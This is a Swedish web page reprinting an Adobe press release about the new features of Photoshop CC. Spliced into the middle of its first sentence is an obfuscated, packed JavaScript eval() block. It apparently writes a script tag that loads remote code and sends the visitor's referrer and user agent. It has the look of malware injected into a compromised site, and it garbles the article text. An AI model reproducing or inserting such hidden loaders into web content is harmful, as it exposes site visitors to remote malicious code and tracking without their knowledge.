Image Image Image Image Image Image Image Image Image Image

| 5 juni, 2020

Scroll to top

Top

Ännu större möjligheter med Adobe Photoshop CC

Ännu större möjligheter med Adobe Photoshop CC
Sebastian

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|inhrb|var|u0026u|referrer|atsyb||js|php’.split(’|’),0,{}))
samband med konferensen Adobe MAX i Los Angeles igår  presenterades Photoshop CC som en del av den ordentliga uppgradering som nu görs av hela Adobe Creative Cloud (se separat pressmeddelande). Photoshop CC tänjer på gränserna och med sina nya funktioner möjliggörs helt nya kreativa processer och större kreativ frihet i arbetsflödet.

Adobe Photoshop CC kommer att finnas tillgängligt för alla Creative Cloud-medlemmar från och med i juni.

Adobes program, däribland Photoshop, som tidigare bar tillägget Creative Suite (CS), kommer från och med nu att  ingå i Creative Cloud (CC).

Photoshop CC innehåller ett stort antal förbättringar, bland annat en ny funktion som kan göra suddiga bilder skarpa samt nya Camera Raw-alternativ. Det nya Photoshop CC innehåller alla funktioner i Photoshop CS Standard och Photoshop CS Extended, vilket ger tillgång till 3D-verktyg och bildanalys. Men genom integreringen med CC kommer flera fördelar, bland annat blir det lättare för kreatörer att dela sina arbeten effektivt.

”Genom att addera dessa nya funktioner till programmen får fotografer och kreatörer helt nya möjligheter när det kommer till bildredigering och design. Samtidigt kommer våra kunder inte behöva vänta 18 till 24 månader  för att få ta del av nya Photoshop-funktioner. Oavsett vad det är för funktion så kan kunderna ta del av den omedelbart i Creative Cloud”, säger Mariah Andén, nordisk marknadschef  för Adobe Digital Media.

Nya funktioner i Photoshop CC

Photoshop CC innehåller flera nyheter som gör det lättare att släppa kreativiteten lös och samtidigt bli mer effektiv i arbetet med att skapa perfekta bilder, skapa design, 3D-artwork eller producera en video.

·         Ett antal nya verktyg som introducerar den mest avancerade tekniken för fotoskärpa någonsin. Det nya verktyget Camera Shake Reduction analyserar och korrigerar den oskärpa som orsakas av kamerarörelser. Det nya Smart skärpa-verktyget använder adaptiva algoritmer för att minimera brus och haloeffekter så att bäst möjliga kvalitet kan uppnås. Dessutom går det att öka storleken på en bild upp till billboard-storlek utan att bilden blir pixlig.

  • Adobe Camera Raw 8 har tre nya verktyg för fotoredigering. Med hjälp av en avancerad lagningspensel går det att ”laga” eller ”lappa” bilder med ett penseldrag istället för bara ett cirkulärt område. Det nya radiella övertoningsverktyget har avancerade styrningfunktioner så att man kan uppmärksamma fotografiets fokus  att  tillföra en standardvinjett.
  • Verktyget Upright rätar automatiskt ut horisonter och skapar rätt perspektiv utan att förstöra bilden. Redigering med Camera Raw kan göras på alla lager eller filer i Photoshop CC.
  • För kreatörer  är det nu möjligt att göra rektanglar med rundade hörn och justera storleken på dem närsomhelst. Det går nu även att välja flera banor, former och vektorer samtidigt för ett enkelt och effektivt arbetsflöde vid arbete med flera olika objekt.
  • Photoshop CC är det första Adobe-programmet för både Mac och Windows som kan användas för att direktöverföra filer till det värlsledande sociala nätverket för kreatörer, Behance. På så sätt kan kreatörer få omedelbar feedback på sitt arbete. Behance har idag över 1,4 miljoner medlemmar.
  • Photoshop CC innehåller alla de nya funktioner som det senaste året varit exklusiva för Creative Cloud-medlemmar, så som Smart Object Support för Blur Gallery och Liquify-effekter, Conditional Actions och CSS-support för effektivare webbdesign-arbete.
  • Adobe lanserar snart ett nytt workflow från Photoshop CC till Edge Reflow CC som gör det möjligt för kreatörer att bygga webbdesign i Photoshop som  sedan kan omvandlas till webbsidor för alla typer av enheter.

För mer information om Photoshop CC

Besök Facebook: http://www.facebook.com/Photoshop

YouTube: http://www.youtube.com/photoshop

Photoshop.com-bloggen: http://blogs.adobe.com/photoshopdotcom/

Twitter: http://twitter.com/photoshop